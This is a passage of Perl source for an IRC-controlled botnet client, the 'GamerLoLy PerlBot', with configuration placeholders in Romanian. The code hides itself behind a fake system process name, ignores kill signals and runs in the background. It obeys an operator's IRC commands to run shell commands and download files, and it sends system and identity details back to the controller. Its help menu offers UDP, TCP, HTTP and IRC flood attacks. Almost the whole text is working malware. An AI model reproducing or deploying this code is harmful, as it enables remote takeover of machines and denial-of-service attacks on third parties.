"/usr/sbin/cron");
my $process = $rps[rand scalar @rps];
my @rversion = ("\001VERSION - unknown command.\001",
"\001mIRC 2018 by GamerLoLy and #Elena\001",
"\001mIRC 2018 by GamerLoLy and #Elena\001",
"\001mIRC 2018 by GamerLoLy and #Elena\001",
"\001mIRC 2018 by GamerLoLy and #Elena\001",
"\001mIRC 2018 by GamerLoLy and #Elena\001",
"\001mIRC 2018 by GamerLoLy and #Elena\001",
"\001mIRC 2018 by GamerLoLy and #Elena\001",
"\001mIRC 2018 by GamerLoLy and #Elena\001",
"\001mIRC 2018 by GamerLoLy and #Elena\001",
"\001mIRC 2018 by GamerLoLy and #Elena\001");
my $vers = $rversion[rand scalar @rversion];
my @rircname = ("BoT[00] - [#E]","BoT[01] - [#E]","BoT[02] - [#E]","BoT[03] - [#E]","BoT[04] - [#E]","BoT[05] - [#E]","BoT[06] - [#E]","BoT[07] - [#E]","BoT[08] - [#E]","BoT[09] - [#E]",
"BoT[10] - [#E]","BoT[11] - [#E]","BoT[12] - [#E]","BoT[13] - [#E]","BoT[14] - [#E]","BoT[15] - [#E]","BoT[16] - [#E]","BoT[17] - [#E]","BoT[18] - [#E]","BoT[19] - [#E]",
"BoT[20] - [#E]","BoT[21] - [#E]","BoT[22] - [#E]","BoT[23] - [#E]","BoT[24] - [#E]","BoT[25] - [#E]","BoT[26] - [#E]","BoT[27] - [#E]","BoT[28] - [#E]","BoT[29] - [#E]",
"BoT[30] - [#E]","BoT[31] - [#E]","BoT[32] - [#E]","BoT[33] - [#E]","BoT[34] - [#E]","BoT[35] - [#E]","BoT[36] - [#E]","BoT[37] - [#E]","BoT[38] - [#E]","BoT[39] - [#E]",
"BoT[40] - [#E]","BoT[41] - [#E]","BoT[42] - [#E]","BoT[43] - [#E]","BoT[44] - [#E]","BoT[45] - [#E]","BoT[46] - [#E]","BoT[47] - [#E]","BoT[48] - [#E]","BoT[49] - [#E]",
"BoT[50] - [#E]","BoT[51] - [#E]","BoT[52] - [#E]","BoT[53] - [#E]","BoT[54] - [#E]","BoT[55] - [#E]","BoT[56] - [#E]","BoT[57] - [#E]","BoT[58] - [#E]","BoT[59] - [#E]",
"BoT[60] - [#E]","BoT[61] - [#E]","BoT[62] - [#E]","BoT[63] - [#E]","BoT[64] - [#E]","BoT[65] - [#E]","BoT[66] - [#E]","BoT[67] - [#E]","BoT[68] - [#E]","BoT[69] - [#E]",
"BoT[70] - [#E]","BoT[71] - [#E]","BoT[72] - [#E]","BoT[73] - [#E]","BoT[74] - [#E]","BoT[75] - [#E]","BoT[76] - [#E]","BoT[77] - [#E]","BoT[78] - [#E]","BoT[79] - [#E]",
"BoT[80] - [#E]","BoT[81] - [#E]","BoT[82] - [#E]","BoT[83] - [#E]","BoT[84] - [#E]","BoT[85] - [#E]","BoT[86] - [#E]","BoT[87] - [#E]","BoT[88] - [#E]","BoT[89] - [#E]",
"BoT[90] - [#E]","BoT[91] - [#E]","BoT[92] - [#E]","BoT[93] - [#E]","BoT[94] - [#E]","BoT[95] - [#E]","BoT[96] - [#E]","BoT[97] - [#E]","BoT[98] - [#E]","BoT[99] - [#E]",
"BoT[100] - [#E]","BoT[101] - [#E]","BoT[102] - [#E]","BoT[103] - [#E]","BoT[104] - [#E]","BoT[105] - [#E]","BoT[106] - [#E]","BoT[107] - [#E]","BoT[108] - [#E]","BoT[109] - [#E]",
"BoT[110] - [#E]","BoT[111] - [#E]","BoT[112] - [#E]","BoT[113] - [#E]","BoT[114] - [#E]","BoT[115] - [#E]","BoT[116] - [#E]","BoT[117] - [#E]","BoT[118] - [#E]","BoT[119] - [#E]",
"BoT[120] - [#E]","BoT[121] - [#E]","BoT[122] - [#E]","BoT[123] - [#E]","BoT[124] - [#E]","BoT[125] - [#E]","BoT[126] - [#E]","BoT[127] - [#E]","BoT[128] - [#E]","BoT[129] - [#E]",
"BoT[130] - [#E]","BoT[131] - [#E]","BoT[132] - [#E]","BoT[133] - [#E]","BoT[134] - [#E]","BoT[135] - [#E]","BoT[136] - [#E]","BoT[137] - [#E]","BoT[138] - [#E]","BoT[139] - [#E]",
"BoT[140] - [#E]","BoT[141] - [#E]","BoT[142] - [#E]","BoT[143] - [#E]","BoT[144] - [#E]","BoT[145] - [#E]","BoT[146] - [#E]","BoT[147] - [#E]","BoT[148] - [#E]","BoT[149] - [#E]",
"BoT[150] - [#E]","BoT[151] - [#E]","BoT[152] - [#E]","BoT[153] - [#E]","BoT[154] - [#E]","BoT[155] - [#E]","BoT[156] - [#E]","BoT[157] - [#E]","BoT[158] - [#E]","BoT[159] - [#E]",
"BoT[160] - [#E]","BoT[161] - [#E]","BoT[162] - [#E]","BoT[163] - [#E]","BoT[164] - [#E]","BoT[165] - [#E]","BoT[166] - [#E]","BoT[167] - [#E]","BoT[168] - [#E]","BoT[169] - [#E]",
"BoT[170] - [#E]","BoT[171] - [#E]","BoT[172] - [#E]","BoT[173] - [#E]","BoT[174] - [#E]","BoT[175] - [#E]","BoT[176] - [#E]","BoT[177] - [#E]","BoT[178] - [#E]","BoT[179] - [#E]",
"BoT[180] - [#E]","BoT[181] - [#E]","BoT[182] - [#E]","BoT[183] - [#E]","BoT[184] - [#E]","BoT[185] - [#E]","BoT[186] - [#E]","BoT[187] - [#E]","BoT[188] - [#E]","BoT[189] - [#E]",
"BoT[190] - [#E]","BoT[191] - [#E]","BoT[192] - [#E]","BoT[193] - [#E]","BoT[194] - [#E]","BoT[195] - [#E]","BoT[196] - [#E]","BoT[197] - [#E]","BoT[198] - [#E]","BoT[199] - [#E]",
"BoT[200] - [#E]","BoT[201] - [#E]","BoT[202] - [#E]","BoT[203] - [#E]","BoT[204] - [#E]","BoT[205] - [#E]","BoT[206] - [#E]","BoT[207] - [#E]","BoT[208] - [#E]","BoT[209] - [#E]",
"BoT[210] - [#E]","BoT[211] - [#E]","BoT[212] - [#E]","BoT[213] - [#E]","BoT[214] - [#E]","BoT[215] - [#E]","BoT[216] - [#E]","BoT[217] - [#E]","BoT[218] - [#E]","BoT[219] - [#E]",
"BoT[220] - [#E]","BoT[221] - [#E]","BoT[222] - [#E]","BoT[223] - [#E]","BoT[224] - [#E]","BoT[225] - [#E]","BoT[226] - [#E]","BoT[227] - [#E]","BoT[228] - [#E]","BoT[229] - [#E]",
"BoT[230] - [#E]","BoT[231] - [#E]","BoT[232] - [#E]","BoT[233] - [#E]","BoT[234] - [#E]","BoT[235] - [#E]","BoT[236] - [#E]","BoT[237] - [#E]","BoT[238] - [#E]","BoT[239] - [#E]",
"BoT[240] - [#E]","BoT[241] - [#E]","BoT[242] - [#E]","BoT[243] - [#E]","BoT[244] - [#E]","BoT[245] - [#E]","BoT[246] - [#E]","BoT[247] - [#E]","BoT[248] - [#E]","BoT[249] - [#E]",
"BoT[250] - [#E]","BoT[251] - [#E]","BoT[252] - [#E]","BoT[253] - [#E]","BoT[254] - [#E]","BoT[255] - [#E]","BoT[256] - [#E]","BoT[257] - [#E]","BoT[258] - [#E]","BoT[259] - [#E]",
"BoT[260] - [#E]","BoT[261] - [#E]","BoT[262] - [#E]","BoT[263] - [#E]","BoT[264] - [#E]","BoT[265] - [#E]","BoT[266] - [#E]","BoT[267] - [#E]","BoT[268] - [#E]","BoT[269] - [#E]",
"BoT[270] - [#E]","BoT[271] - [#E]","BoT[272] - [#E]","BoT[273] - [#E]","BoT[274] - [#E]","BoT[275] - [#E]","BoT[276] - [#E]","BoT[277] - [#E]","BoT[278] - [#E]","BoT[279] - [#E]",
"BoT[280] - [#E]","BoT[281] - [#E]","BoT[282] - [#E]","BoT[283] - [#E]","BoT[284] - [#E]","BoT[285] - [#E]","BoT[286] - [#E]","BoT[287] - [#E]","BoT[288] - [#E]","BoT[289] - [#E]",
"BoT[290] - [#E]","BoT[291] - [#E]","BoT[292] - [#E]","BoT[293] - [#E]","BoT[294] - [#E]","BoT[295] - [#E]","BoT[296] - [#E]","BoT[297] - [#E]","BoT[298] - [#E]","BoT[299] - [#E]",
"BoT[300] - [#E]","BoT[301] - [#E]","BoT[302] - [#E]","BoT[303] - [#E]","BoT[304] - [#E]","BoT[305] - [#E]","BoT[306] - [#E]","BoT[307] - [#E]","BoT[308] - [#E]","BoT[309] - [#E]",
"BoT[310] - [#E]","BoT[311] - [#E]","BoT[312] - [#E]","BoT[313] - [#E]","BoT[314] - [#E]","BoT[315] - [#E]","BoT[316] - [#E]","BoT[317] - [#E]","BoT[318] - [#E]","BoT[319] - [#E]",
"BoT[320] - [#E]","BoT[321] - [#E]","BoT[322] - [#E]","BoT[323] - [#E]","BoT[324] - [#E]","BoT[325] - [#E]","BoT[326] - [#E]","BoT[327] - [#E]","BoT[328] - [#E]","BoT[329] - [#E]",
"BoT[330] - [#E]","BoT[331] - [#E]","BoT[332] - [#E]","BoT[333] - [#E]","BoT[334] - [#E]","BoT[335] - [#E]","BoT[336] - [#E]","BoT[337] - [#E]","BoT[338] - [#E]","BoT[339] - [#E]",
"BoT[340] - [#E]","BoT[341] - [#E]","BoT[342] - [#E]","BoT[343] - [#E]","BoT[344] - [#E]","BoT[345] - [#E]","BoT[346] - [#E]","BoT[347] - [#E]","BoT[348] - [#E]","BoT[349] - [#E]",
"BoT[350] - [#E]","BoT[351] - [#E]","BoT[352] - [#E]","BoT[353] - [#E]","BoT[354] - [#E]","BoT[355] - [#E]","BoT[356] - [#E]","BoT[357] - [#E]","BoT[358] - [#E]","BoT[359] - [#E]",
"BoT[360] - [#E]","BoT[361] - [#E]","BoT[362] - [#E]","BoT[363] - [#E]","BoT[364] - [#E]","BoT[365] - [#E]","BoT[366] - [#E]","BoT[367] - [#E]","BoT[368] - [#E]","BoT[369] - [#E]",
"BoT[370] - [#E]","BoT[371] - [#E]","BoT[372] - [#E]","BoT[373] - [#E]","BoT[374] - [#E]","BoT[375] - [#E]","BoT[376] - [#E]","BoT[377] - [#E]","BoT[378] - [#E]","BoT[379] - [#E]",
"BoT[380] - [#E]","BoT[381] - [#E]","BoT[382] - [#E]","BoT[383] - [#E]","BoT[384] - [#E]","BoT[385] - [#E]","BoT[386] - [#E]","BoT[387] - [#E]","BoT[388] - [#E]","BoT[389] - [#E]",
"BoT[390] - [#E]","BoT[391] - [#E]","BoT[392] - [#E]","BoT[393] - [#E]","BoT[394] - [#E]","BoT[395] - [#E]","BoT[396] - [#E]","BoT[397] - [#E]","BoT[398] - [#E]","BoT[399] - [#E]",
"BoT[400] - [#E]","BoT[401] - [#E]","BoT[402] - [#E]","BoT[403] - [#E]","BoT[404] - [#E]","BoT[405] - [#E]","BoT[406] - [#E]","BoT[407] - [#E]","BoT[408] - [#E]","BoT[409] - [#E]",
"BoT[410] - [#E]","BoT[411] - [#E]","BoT[412] - [#E]","BoT[413] - [#E]","BoT[414] - [#E]","BoT[415] - [#E]","BoT[416] - [#E]","BoT[417] - [#E]","BoT[418] - [#E]","BoT[419] - [#E]",
"BoT[420] - [#E]","BoT[421] - [#E]","BoT[422] - [#E]","BoT[423] - [#E]","BoT[424] - [#E]","BoT[425] - [#E]","BoT[426] - [#E]","BoT[427] - [#E]","BoT[428] - [#E]","BoT[429] - [#E]",
"BoT[430] - [#E]","BoT[431] - [#E]","BoT[432] - [#E]","BoT[433] - [#E]","BoT[434] - [#E]","BoT[435] - [#E]","BoT[436] - [#E]","BoT[437] - [#E]","BoT[438] - [#E]","BoT[439] - [#E]",
"BoT[440] - [#E]","BoT[441] - [#E]","BoT[442] - [#E]","BoT[443] - [#E]","BoT[444] - [#E]","BoT[445] - [#E]","BoT[446] - [#E]","BoT[447] - [#E]","BoT[448] - [#E]","BoT[449] - [#E]",
"BoT[450] - [#E]","BoT[451] - [#E]","BoT[452] - [#E]","BoT[453] - [#E]","BoT[454] - [#E]","BoT[455] - [#E]","BoT[456] - [#E]","BoT[457] - [#E]","BoT[458] - [#E]","BoT[459] - [#E]",
"BoT[460] - [#E]","BoT[461] - [#E]","BoT[462] - [#E]","BoT[463] - [#E]","BoT[464] - [#E]","BoT[465] - [#E]","BoT[466] - [#E]","BoT[467] - [#E]","BoT[468] - [#E]","BoT[469] - [#E]",
"BoT[470] - [#E]","BoT[471] - [#E]","BoT[472] - [#E]","BoT[473] - [#E]","BoT[474] - [#E]","BoT[475] - [#E]","BoT[476] - [#E]","BoT[477] - [#E]","BoT[478] - [#E]","BoT[479] - [#E]",
"BoT[480] - [#E]","BoT[481] - [#E]","BoT[482] - [#E]","BoT[483] - [#E]","BoT[484] - [#E]","BoT[485] - [#E]","BoT[486] - [#E]","BoT[487] - [#E]","BoT[488] - [#E]","BoT[489] - [#E]",
"BoT[490] - [#E]","BoT[491] - [#E]","BoT[492] - [#E]","BoT[493] - [#E]","BoT[494] - [#E]","BoT[495] - [#E]","BoT[496] - [#E]","BoT[497] - [#E]","BoT[498] - [#E]","BoT[499] - [#E]",
"BoT[500] - [#E]","BoT[501] - [#E]","BoT[502] - [#E]","BoT[503] - [#E]","BoT[504] - [#E]","BoT[505] - [#E]","BoT[506] - [#E]","BoT[507] - [#E]","BoT[508] - [#E]","BoT[509] - [#E]",
"BoT[510] - [#E]","BoT[511] - [#E]","BoT[512] - [#E]","BoT[513] - [#E]","BoT[514] - [#E]","BoT[515] - [#E]","BoT[516] - [#E]","BoT[517] - [#E]","BoT[518] - [#E]","BoT[519] - [#E]",
"BoT[520] - [#E]","BoT[521] - [#E]","BoT[522] - [#E]","BoT[523] - [#E]","BoT[524] - [#E]","BoT[525] - [#E]","BoT[526] - [#E]","BoT[527] - [#E]","BoT[528] - [#E]","BoT[529] - [#E]",
"BoT[530] - [#E]","BoT[531] - [#E]","BoT[532] - [#E]","BoT[533] - [#E]","BoT[534] - [#E]","BoT[535] - [#E]","BoT[536] - [#E]","BoT[537] - [#E]","BoT[538] - [#E]","BoT[539] - [#E]",
"BoT[540] - [#E]","BoT[541] - [#E]","BoT[542] - [#E]","BoT[543] - [#E]","BoT[544] - [#E]","BoT[545] - [#E]","BoT[546] - [#E]","BoT[547] - [#E]","BoT[548] - [#E]","BoT[549] - [#E]",
"BoT[550] - [#E]","BoT[551] - [#E]","BoT[552] - [#E]","BoT[553] - [#E]","BoT[554] - [#E]","BoT[555] - [#E]","BoT[556] - [#E]","BoT[557] - [#E]","BoT[558] - [#E]","BoT[559] - [#E]",
"BoT[560] - [#E]","BoT[561] - [#E]","BoT[562] - [#E]","BoT[563] - [#E]","BoT[564] - [#E]","BoT[565] - [#E]","BoT[566] - [#E]","BoT[567] - [#E]","BoT[568] - [#E]","BoT[569] - [#E]",
"BoT[570] - [#E]","BoT[571] - [#E]","BoT[572] - [#E]","BoT[573] - [#E]","BoT[574] - [#E]","BoT[575] - [#E]","BoT[576] - [#E]","BoT[577] - [#E]","BoT[578] - [#E]","BoT[579] - [#E]",
"BoT[580] - [#E]","BoT[581] - [#E]","BoT[582] - [#E]","BoT[583] - [#E]","BoT[584] - [#E]","BoT[585] - [#E]","BoT[586] - [#E]","BoT[587] - [#E]","BoT[588] - [#E]","BoT[589] - [#E]",
"BoT[590] - [#E]","BoT[591] - [#E]","BoT[592] - [#E]","BoT[593] - [#E]","BoT[594] - [#E]","BoT[595] - [#E]","BoT[596] - [#E]","BoT[597] - [#E]","BoT[598] - [#E]","BoT[599] - [#E]",
"BoT[600] - [#E]");
my $ircname = $rircname[rand scalar @rircname];
## my @rrealname = ("4,1[ GamerLoLy start HACKED ]",
## "4,1 /!\ GamerLoLy start HACKED /!\ ",
## "12,1<///8,1///4,1###>",
## "2,1---=== 4,1 GamerLoLy start HACKED 2,1===---");
## chop (my $realname = $rrealname[rand scalar @rrealname]);
chop (my $realname = $rircname[rand scalar @rircname]);
## my @nickname = ("GamerLoLy");
## my $nick =$nickname[rand scalar @nickname];
my $nick =$rircname[rand scalar @rircname];
$server = 'ip-ul de la vps' unless $server;
my $port = 'aici pui portul ex:7777';
my $linas_max='8';
my $sleep='5';
my $homedir ="/tmp";
my $version = 'Irc 2018 - GamerLoLy and #Elena';
my @admins = ("Aici pui numele la admin");
my @hostauth = ("host-ul pe care l-ai setat in unrealircd.con");
my @channels = ("Channel-ul pe care l-ai setat in unrealircd.con unde sa intre perli/pma-urile");
my $pacotes = 1;
#################################################################
##### [ Stop Editing if you dont know what are you doing. ] #####
#################################################################
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use Socket;
use IO::Socket;
use IO::Socket::INET;
use IO::Select;
chdir("$homedir");
$server="$ARGV[0]"if $ARGV[0];
$0="$process"."\0"x16;;
my $pid=fork;
exit if $pid;
die"Can't fork in background: $!"unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket"$_[1]\n";
} else {
print $IRC_cur_socket"$_[0]\n";
}
}
sub getstore ($$)
{
my $url = shift;
my $file = shift;
$http_stream_out = 1;
open(GET_OUTFILE,"> $file");
%http_loop_check = ();
_get($url);
close GET_OUTFILE;
return $main::http_get_result;
}
sub _get
{
my $url = shift;
my $proxy ="";
grep {(lc($_) eq"http_proxy") && ($proxy = $ENV{$_})} keys %ENV;
if (($proxy eq"") && $url =~ m,^http://([^/:]+)(?::(\d+))?(/\S*)?$,) {
my $host = $1;
my $port = $2 || 80;
my $path = $3;
$path ="/"unless defined($path);
return _trivial_http_get($host, $port, $path);
} elsif ($proxy =~ m,^http://([^/:]+):(\d+)(/\S*)?$,) {
my $host = $1;
my $port = $2;
my $path = $url;
return _trivial_http_get($host, $port, $path);
} else {
return undef;
}
}
sub _trivial_http_get
{
my($host, $port, $path) = @_;
my($AGENT, $VERSION, $p);
$AGENT ="get-minimal";
$VERSION ="20000118";
$path =~ s/ /%20/g;
require IO::Socket;
local($^W) = 0;
my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Timeout => 60) || return;
$sock->autoflush;
my $netloc = $host;
$netloc .=":$port"if $port != 80;
my $request ="GET $path HTTP/1.0\015\012"
."Host: $netloc\015\012"
."User-Agent: $AGENT/$VERSION/u\015\012";
$request .="Pragma: no-cache\015\012"if ($main::http_no_cache);
$request .="\015\012";
print $sock $request;
my $buf ="";
my $n;
my $b1 ="";
while ($n = sysread($sock, $buf, 8*1024, length($buf))) {
if ($b1 eq"") {
$b1 = $buf;
$buf =~ s/.+?\015?\012\015?\012//s;
}
if ($http_stream_out) { print GET_OUTFILE $buf; $buf =""; }
}
return undef unless defined($n);
$main::http_get_result = 200;
if ($b1 =~ m,^HTTP/\d+\.\d+\s+(\d+)[^\012]*\012,) {
$main::http_get_result = $1;
if ($main::http_get_result =~ /^30[1237]/ && $b1 =~ /\012Location:\s*(\S+)/) {
my $url = $1;
return undef if $http_loop_check{$url}++;
return _get($url);
}
return undef unless $main::http_get_result =~ /^2/;
}
return $buf;
}
sub conectar {
my $meunick = $_[0];
my $server_con = $_[1];
my $port_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server_con",
PeerPort=>$port_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} ="$server_con";
$irc_servers{$IRC_cur_socket}{'port'} ="$port_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname".$IRC_socket->sockhost."$server_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick","$server","$port"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn","".$vers."");
}
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
if (grep {$_ =~ /^\Q$pn\E$/i } @admins ) {
if ($onde eq"$meunick"){
shell("$pn","$args");
}
if ($args =~ /^(\Q$meunick\E|\!u)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1");
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde","$arg");
}
}
}
}
}
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick-".int rand(9999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} ="$1";
foreach my $canal (@channels) {
sendraw("MODE $nick +x");
sendraw("JOIN $canal");
sendraw("PRIVMSG $canal :4,1 [#IRC] 9,1P̵̡͎̤̪̬͔̃͐͋o̶̠̘͎̜̭͈̺̥̳͈͒s̸̡̛͕̹̞̤̤̘̎̈́̈́͊͗̽͆ĩ̸̢̡̨̨̮̝̫̯͇̺̾̕ḇ̵̢̙̱̺̫̻̲͑́̊͋͒̽͘ͅī̴̧̖l̸̢̧͉̞̹̈́ ̶̞̱̟̜̬̖̤́̓n̶̗̖̺̟̺͓̿͛̊͗͗u̵̳̠̠͙̱̰̽̊͊̈́͋̓ ̶̮̤̊͊͑̒̈̚̚͠o̷͔̳̯̜̿̀̀͗̿̈̕ ̶̢͖̠̞̅͊͋̍̈́́s̵̱̙̭̈́̓̓͊͠ą̸̤̆̇̃͜-̷̨̥̜̫͇̱̥̈̋͐̐̀̃̓́͜͜͝ͅț̷̝͚̪̟̞͐͂̾̋͠ĩ̵̹̾̋̎́̀̊ ̸̗͚͈̼̘̔͘r̴͚͂͐̽̿͑͋͋̚ė̵̱͊̑̊̍̅̇̽ȕ̵̳̦ș̵͍̞̽̂̃̋̉̉̈́͝͝e̴̠̫̔̍̋͗̐̕a̸̙͚͙̥͈͓̘͌̇̑̽̈́̀ş̵̨̲̥̲̳́̌͑̈́̓̉ͅc̷̮͚̖̮͔̉̀́̿ẳ̶̘̜̜͕̮̓̅̐́̈́̀̈͜͠͝,̷̧͇͖̣̝̝̺̻̐̈́̔̈́͐̄̂̂͒͝ ̷͓͓͇̄d̶̝̗̙͔͇̯̻͊͜ḁ̶̡̲̰͈̺͓̻͆̀́͗́̿ṟ̵͉̣̪͌͒̄͂ ̸̻͇̒̃̒̓̾̍m̶̨̧͎͙͙̣̗͉̥͓̋̓̔͑̇́͠ë̵̩̱̜͎̣́ṛ̷͎̙̙̩̭̗̿́̿̏͂ì̸̛̯̞̄̃̀̍̏ţ̶̪̖̤͙̫̟̣̮̂̉̐̌̑͘ă̴̡̛͖̰̞̱̩̭͜ ̴̢̛̞̩̻͇̈́̈́͊ͅî̶̮̬͖̗̔͋̓̂͑̂̾͘͠ň̵̡̡̖̪̯͘ť̷̹̰̲͔̘͔̙̘̞̖ơ̴̻̮̮̱̖͍̮̓͋̓̄̀̀̈́͝t̶̛͇̋͆̅͗̋̑͘͘d̶̫̩͇͕̞͔͚̑̃͜ȩ̵̻̾̽̎̆̑̉́͝a̴̢̗̟͖̲̔̏̐̃͌̾͜ͅu̴͓̳̓̋͗̾̇͆ņ̸͎͖͕̰̙͚̏́à̸̛̟̗̣̙͗͋͊ͅ ̸͎̓͛̏̆͆͂̌̂͝ṣ̷̡̧̠̮͙̀̽̈͛͊̊̇͛͝ă̷̮̆͑ ̷̛̜͈̲͌̅̉̿̿̄̄̚î̵̢̢̡̘̜̖͚̬̔̅͠n̴͚̞̩̠͕̣̻̺̱̊c̷̥̥̫̓̿͌̂̈́̾͐̀͗̐ȅ̸̻̘̝̲̟̳̟̤̀̈́̂͋̕͝͝r̸̢̢̙͈̭͊͗̄̇͘c̵̬͈̅ĩ̶͖̟͓̮̥̻̭͙͊. ❤ ");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
###########################
##### [ Help Module ] #####
###########################
if ($funcarg =~ /^help/) {
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1======================= ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1GamerLoLy PerlBot - Main Help: ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1======================= ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1system ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1version ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1channel ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1flood ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1utils ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1======================= ");
}
if ($funcarg =~ /^system/) {
$uptime=`uptime`;
$ownd=`pwd`;
$id=`id`;
$uname=`uname -srp`;
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [System] 9,1=================== ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [System] 9,1Bot Configuration: ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [System] 9,1=================== ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [System] 9,1*Server : 12$server");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [System] 9,1*Port : 12$port");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [System] 9,1*Channels : 12@channels");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [System] 9,1*uname -a : 12$uname");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [System] 9,1*uptime : 12$uptime");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [System] 9,1*FakeProcess : 12$process");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [System] 9,1*ProcessPID : 12$$");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [System] 9,1*ID : 12$id");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [System] 9,1*Own Dir : 12$ownd");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [System] 9,1=================== ");
}
if ($funcarg =~ /^version/){
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Version] 9,1================================== ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Version] 9,1Bot Informations: ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Version] 9,1================================== ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Version] 9,1*Bot Version : 12$version ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Version] 9,1*Bot Creator : 12GamerLoLy ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Version] 9,1*Bot Year : 122012 ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Version] 9,1================================== ");
}
if ($funcarg =~ /^flood/) {
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1GamerLoLy PerlBot - Flood Help: ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp1 <ip> <port> <time> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp2 <ip> <packet size> <time> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp3 <ip> <port> <time> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1tcp <ip> <port> <packet size> <time> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1http <site> <time> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1ctcpflood <nick> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1msgflood <nick> ");
